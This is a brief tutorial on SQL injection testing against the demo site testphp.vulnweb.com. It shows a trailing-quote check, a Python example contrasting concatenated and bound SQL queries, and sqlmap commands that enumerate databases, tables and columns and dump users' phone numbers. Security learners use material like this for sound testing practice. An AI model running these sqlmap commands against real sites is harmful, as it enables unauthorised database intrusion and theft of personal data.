SQL Injection Testing Using SQLMAP


Try out SQLMAP on this vulnerable website: testphp.vulnweb.com

Test for a simple SQL injection by appending a single quote (') to the end of the URL.
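Why the trailing quote is a useful check, shown as an added example that is not part of the original page: it assumes a handler that concatenates the artist parameter into its query, and compares it with a bound-parameter version. The in-memory SQLite table is constructed sample data, and make_db, lookup_concat, lookup_bound and quote_probe are hypothetical names.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for an artists table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)",
                     [(1, "artist one"), (2, "artist two")])
    return conn


def lookup_concat(conn, artist):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so a stray quote changes how the statement parses.
    sql = "SELECT name FROM artists WHERE id = " + artist
    return conn.execute(sql).fetchall()


def lookup_bound(conn, artist):
    # Hardened pattern: the parameter is bound as data and never parsed as SQL.
    return conn.execute("SELECT name FROM artists WHERE id = ?",
                        (artist,)).fetchall()


def quote_probe(lookup, conn, value="1"):
    """Call the lookup with the value, then with a trailing quote, and report."""
    baseline = lookup(conn, value)
    try:
        quoted = lookup(conn, value + "'")
    except sqlite3.Error as exc:
        # The quote reached the SQL parser: the input is being treated as code.
        return {"baseline": baseline, "verdict": "sql-error", "detail": str(exc)}
    # The quote was compared as an ordinary value; no row has the id "1'".
    return {"baseline": baseline, "verdict": "handled-as-data", "rows": quoted}


if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concat, lookup_bound):
        print(fn.__name__, quote_probe(fn, db))
```

A database error on the quoted request is the sign that input reaches the SQL parser; the bound version returns the same baseline row and simply finds no match for the quoted value.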

Let’s try with SQLMAP

Finding databases

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

--dbs lists all the available databases.

2 databases available

Finding tables inside the database

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables

Finding columns in the database

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns

Dump the data

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users -C phone --dump

This retrieves the phone numbers.

Use the same command with the various columns to retrieve data.